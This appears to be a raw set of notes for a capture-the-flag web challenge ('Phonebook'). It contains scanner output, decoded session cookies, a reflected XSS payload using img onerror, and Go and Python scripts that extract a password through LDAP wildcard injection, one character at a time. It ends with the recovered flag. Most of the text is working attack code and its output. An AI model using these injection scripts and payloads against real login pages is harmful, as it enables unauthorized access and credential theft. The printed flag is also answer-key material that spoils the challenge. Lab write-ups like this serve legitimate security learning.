$ nikto -h http://46.101.91.21:31893
+ Server: No banner retrieved
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /login
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ 7917 requests: 0 error(s) and 3 item(s) reported on remote host
$ dirb http://46.101.91.21:31893
---- Scanning URL: http://46.101.91.21:31893/ ----
+ http://46.101.91.21:31893/login (CODE:200|SIZE:2214)
http://206.189.121.131:30730/login?message=Authentication%20failed
HPSESSID
PHPSESSID:"Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9"
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}
session:".eJyrVsrMSy9KTclMzStRsqpWUkhSslJKNqowjcyNMojMczKJCrS1VarVUcpNTSwuLUrNBaorhiv0D86v9E0HKagFAG5cF4c.YJVejA.yvsXnGDjmB808wzRx-lK2iSNg1E"
{"ingredient":{" b":"c2x5YmZ0YnB4ZQ=="},"measurements":{" b":"OSoyMg=="}}
slybftbpxe 9*22
mysession:"MTYyMDU2NjMzM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpfLUNBQUVHYzNSeWFXNW5EQW9BQ0dGMWRHaDFjMlZ5Qm5OMGNtbHVad3dIQUFWeVpXVnpaUT09fEY-6tkbg4z2_OV-z2-DXx31sGRRre145G1SD8SdkHHI"
1620566333|Dv-BBAEC_4IAARABEAAAJ_-CAAEGc3RyaW5nDAoACGF1dGh1c2VyBnN0cmluZwwHAAVyZWVzZQ==|F>êÙ...öüå~Ïo._.õ°dQ.íxämR.Ä..qÈ
?message=<script>alert()</script> not work???
http://138.68.182.108:31629/login?message=%3Cscript%3Ealert()%3C/script%3E
?message=<img src=x onerror=alert(1) /> work
http://138.68.182.108:31629/login?message=%3Cimg%20src=x%20onerror=alert(1)%20/%3E
<script>
const queryString = window.location.search;
if (queryString) {
const urlParams = new URLSearchParams(queryString);
const message = urlParams.get('message');
if (message) {
document.getElementById("message").innerHTML = message;
document.getElementById("message").style.visibility = "visible";
}
}
</script>
$ go run gocheck.go http://138.68.182.108:31629/login
\ => 500 => http://134.209.25.183:32562/login
) => 500 => http://134.209.25.183:32562/login
* => 200 => http://134.209.25.183:32562/login
here is gocheck.go
import (
"fmt"
"net/http"
"net/url"
"os"
"sync"
)
func makeReq(URL string, ascii int, wg *sync.WaitGroup) {
defer wg.Done()
payload := string(ascii) //converting ascii value to character
//submitting form data
res, err := http.PostForm(URL, url.Values{
"username": {payload},
"password": {payload},
})
if err != nil {
fmt.Println(err)
}
fmt.Printf("%s => %d => %s\n", payload, res.StatusCode, res.Request.URL)
}
func main() {
var wg sync.WaitGroup
if len(os.Args[1:]) > 1 || len(os.Args[1:]) == 0 {
fmt.Println("ERR: one URL at a time can be passed.")
os.Exit(0)
}
URL := os.Args[1:][0] //URL as command line argument
// looping from 32 to 126 ascii values
// I know some values are unnecessary, will fix 'em later
for i := 32; i <= 126; i++ {
go makeReq(URL, i, &wg)
wg.Add(1)
}
wg.Wait()
}
here is go code to find the flag: phonebook.go
package main
import (
"fmt"
"net/http"
"net/url"
"os"
)
type retData struct {
StatusCode int
redirURL string
}
//lookup list generator
func genLookup(n1, n2 int) []string {
var lookup []string
for i := n1; i <= n2; i++ {
lookup = append(lookup, string(i))
}
return lookup
}
//request maker
func makeReq(URL, tmp string) retData {
uname := "Reese"
pass := tmp + "*"
res, err := http.PostForm(URL, url.Values{
"username": {uname},
"password": {pass},
})
if err != nil {
fmt.Println("ERR:", err)
os.Exit(0)
}
defer res.Body.Close()
return retData{res.StatusCode, res.Request.URL.String()}
}
func fuzz(URL string, payload *string, lookup []string) {
lookupLen := len(lookup) - 1
i := 0
for i <= lookupLen {
tmp := *payload + lookup[i]
info := makeReq(URL, tmp)
if info.StatusCode == 200 && info.redirURL == URL {
if i != lookupLen {
i = 0
}
*payload = tmp
} else {
i++
}
fmt.Println(tmp)
}
}
func main() {
args := os.Args[1:]
if len(args) == 0 {
fmt.Println("Invalid Input")
os.Exit(0)
}
URL := args[0]
var payload string = ""
lookup := genLookup(48, 126) //generate lookup list using ascii values
fmt.Println(lookup)
fmt.Printf("starting...\n")
fuzz(URL, &payload, lookup)
fmt.Println(payload)
}
$ go run phonebook.go http://138.68.182.108:31629/login
HTB{d1rectory_h4xx0r_is_k00l}
python, phonebook.py:
#!/usr/bin/env python3
# imports
import requests
import os
import sys
if (len(sys.argv)==2):
target=sys.argv[1]#taking arg as the url/target
ppgot=''#Sucessful chars user
psgot=''#Sucessful chars password
else:
print("-------------------------- ERROR FOUND -----------------------")
print("Usage: "+str(sys.argv[0])+"http://url:port/login") # error msg
exit()
#characters
input_data = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z","#","$","%","@","!","0","1","2","3","4","5","6","7","8","9","{","}","[","]","_","&","^"," "]
success_user = requests.post(target,data={'username':'*','password':"*"}).text
fail_user = requests.post(target,data={'username':"a",'password':"a"}).text
success_psswd = requests.post(target,data={'username':ppgot,'password':"*"}).text
fail_psswd = requests.post(target,data={'username':"a",'password':"a"}).text
def user(input_data,ppgot,success_user,fail_user):
for c in input_data:
checking = ppgot + c + '*'
payload = {'username':checking,'password':'*'}
req = requests.post(target,data=payload).text
if req != fail_user:
os.system('clear')
print('DECODED: ' + ppgot + c)
ppgot = ppgot + c
user(input_data,ppgot,success_user,fail_user)
exit()
else:
os.system("clear")
print("Decoding: " + str(ppgot) + str(c))
print("Completed, user: ",ppgot)
passwd(input_data,ppgot,psgot,success_psswd,fail_psswd)
def passwd(input_data,ppgot,psgot,success_psswd,fail_psswd):
for c in input_data:
tst = psgot+c+"*"
payload = {'username':ppgot,'password':tst}
req = requests.post(target,data = payload).text
if req != fail_psswd:
os.system("clear")
print("Completed, user: ",ppgot)
print("DECODED: " + psgot + c)
passwd(input_data,ppgot,psgot + c,success_psswd,fail_psswd)
exit()
else:
os.system("clear")
print("Completed, user: ",ppgot)
print("Decoding: "+ str(psgot) + str(c))
print("Completed User: ",ppgot," Password ",psgot)
user(input_data,ppgot,success_user,fail_user)
another python script, simple.py
import requests
import string
l = list(string.ascii_lowercase)
u = list(string.ascii_uppercase)
passlist = l + u + ['0','1','2','3','4','5','6','7','8','9','_','}']
payload = 'HTB{'
passwd= ''
while 1 :
for char in passlist:
passwd = payload + char + '*)(&'
data0 = {'username':'Reese', 'password':passwd}
re = requests.post('http://206.189.121.131:30730/login', data = data0)
if 'success' in re.text:
payload = payload+char
print(payload)
else: print(payload)